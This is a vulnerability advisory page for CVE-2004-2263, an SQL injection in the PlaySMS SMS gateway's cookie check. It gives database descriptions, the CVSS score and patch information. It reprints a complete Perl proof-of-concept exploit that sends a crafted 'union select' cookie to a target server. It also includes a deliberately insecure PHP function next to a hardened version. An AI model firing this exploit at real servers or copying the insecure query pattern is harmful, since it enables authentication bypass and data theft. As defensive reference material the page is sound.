CVE-2004-2263
CVSS 7.5
Published: 2004-12-31 00:00:00
Revised: 2008-09-05 16:43:38

[Original] SQL injection vulnerability in the valid function in fr_left.php in PlaySMS 0.7 and earlier allows remote attackers to modify SQL statements via the vc2 cookie.


[CNNVD] PlaySMS Cookie SQL Injection Vulnerability (CNNVD-200412-376)

        
Anton Raharja's PlaySMS is an SMS gateway application for handling single or broadcast SMS messages.
PlaySMS does not sufficiently filter user input; a remote attacker can exploit this vulnerability to execute arbitrary SQL commands and bypass authentication.
The valid() function in PlaySMS does not sufficiently filter user-supplied COOKIE data. If the server's "magic_quotes_gpc" setting is 'off', a remote user can supply a specially crafted COOKIE value to execute SQL commands, resulting in unauthorized access to the system.
        

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/a:playsms:playsms:0.6
cpe:/a:playsms:playsms:0.7

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2263
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2263
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-376
(official data source) CNNVD

- Other links and resources

http://xforce.iss.net/xforce/xfdb/17031
(PATCH)  XF  playsms-valid-sql-injection(17031)
http://www.securityfocus.com/bid/10970
(PATCH)  BID  10970
http://www.osvdb.org/8984
(PATCH)  OSVDB  8984
http://sourceforge.net/project/shownotes.php?release_id=254915
(PATCH)  CONFIRM  http://sourceforge.net/project/shownotes.php?release_id=254915
http://securitytracker.com/id?1010984
(PATCH)  SECTRACK  1010984
http://www.securiteam.com/unixfocus/5UP0F2ADPS.html
(VENDOR_ADVISORY)  MISC  http://www.securiteam.com/unixfocus/5UP0F2ADPS.html

- Vulnerability information

PlaySMS Cookie SQL Injection Vulnerability
High risk  Input validation
2004-12-31 00:00:00 2006-09-23 00:00:00
Remote

- Advisory and patches

Vendor patch:
PlaySMS
-------
The vendor has released an upgrade that fixes this security issue; download the upgraded version, PlaySMS 0.7.1, from the vendor's homepage:

http://playsms.sourceforge.net/web/

- Vulnerability information (404)

PlaySMS <= 0.7 SQL Injection Exploit (EDBID:404)
linux remote
2004-08-19 Verified
0 Noam Rathaus
N/A
#!/usr/bin/perl
# PlaySMS version 0.7 and prior SQL Injection PoC
# Written by Noam Rathaus of Beyond Security Ltd.
#

use IO::Socket;
use strict;

my $host = $ARGV[0];

# Plain TCP connection to the web server on port 80
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "80" );

unless ($remote) { die "cannot connect to http daemon on $host" }

print "connected\n";

$remote->autoflush(1);

# Raw HTTP/1.1 request; the vc2 cookie carries the injected SQL fragment
my $http = "GET /~playsms/fr_left.php HTTP/1.1
Host: $host:80
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040712 Firefox/0.9.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Cookie: vc1=ticket; vc2='%20union%20select%20'ticket;
Content-Type: application/x-www-form-urlencoded
Connection: close

";

print "HTTP: [$http]\n";
print $remote $http;
sleep(1);
print "Sent\n";

# Echo the server's response verbatim
while (<$remote>)
{
    print $_;
}
print "\n";

close $remote;

# milw0rm.com [2004-08-19]

- Vulnerability information

8984
PlaySMS Cookie SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- Vulnerability description

PlaySMS contains a flaw that will allow an attacker to inject arbitrary SQL code. The problem is that if the magic_quotes_gpc option is disabled, the "vc2" variable in the cookie is not verified properly and will allow an attacker to inject or manipulate SQL queries. (NOTE: setting "magic_quotes_gpc" to "Off" is discouraged by the author of the program in the INSTALL file.)
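The descriptions above (CNNVD and OSVDB) both come down to the same defect: a cookie value is spliced into SQL text, and the only thing standing between it and the parser is the PHP-wide magic_quotes_gpc setting. The following PHP is an added illustration, not PlaySMS's own code and not the patch shipped in 0.7.1. It reconstructs, as an assumption, the kind of cookie-driven ticket check the advisories attribute to valid() in fr_left.php, and places it beside a version that does not depend on magic_quotes_gpc at all. The table and column names (playsms_tblUser, username, ticket) and the ticket format are placeholders chosen here, not taken from the project.

```php
<?php
// Added illustration, not PlaySMS's own code. The table/column names
// (playsms_tblUser, username, ticket) and the 32-character ticket format
// are assumptions made for this example.

// Insecure pattern: the raw cookie values are spliced into the SQL text.
// With magic_quotes_gpc=Off nothing escapes quote characters, so a cookie
// value can change the structure of the query rather than just its data.
function valid_insecure(mysqli $db, array $cookie): bool
{
    $vc1 = $cookie['vc1'] ?? '';
    $vc2 = $cookie['vc2'] ?? '';
    $sql = "SELECT username FROM playsms_tblUser "
         . "WHERE username='$vc1' AND ticket='$vc2'";
    $res = $db->query($sql);
    return $res !== false && $res->num_rows > 0;
}

// Hardened version: a prepared statement sends the cookie bytes as bound
// parameters, so they are never parsed as SQL, whatever the value of
// magic_quotes_gpc (which PHP removed in 5.4 anyway).
function valid_secure(mysqli $db, array $cookie): bool
{
    $vc1 = $cookie['vc1'] ?? '';
    $vc2 = $cookie['vc2'] ?? '';

    // Structural check before any database work: the ticket is assumed here
    // to be a 32-character alphanumeric token, so anything else is rejected
    // outright; such rejects are worth logging as probes.
    if ($vc1 === '' || !preg_match('/^[A-Za-z0-9]{32}$/', $vc2)) {
        return false;
    }

    $stmt = $db->prepare(
        'SELECT 1 FROM playsms_tblUser WHERE username = ? AND ticket = ? LIMIT 1'
    );
    $stmt->bind_param('ss', $vc1, $vc2);
    $stmt->execute();
    $stmt->store_result();
    $ok = ($stmt->num_rows === 1);
    $stmt->close();
    return $ok;
}

// Usage, assuming an open mysqli connection in $db:
// if (!valid_secure($db, $_COOKIE)) { header('Location: login.php'); exit; }
```

The point of the second function is that correctness no longer rests on a server-wide php.ini switch that the INSTALL file can only ask administrators to leave on; the query shape is fixed at prepare time and the cookie content is pure data. The allow-list check in front of it is cheap defence in depth and gives an obvious place to emit a log line when a cookie arrives in a shape the application never issues.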

- Timeline

2004-08-18 Unknown
2004-08-18 Unknown

- Solution

Upgrade to version 0.7.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related references

- Vulnerability author

 

 
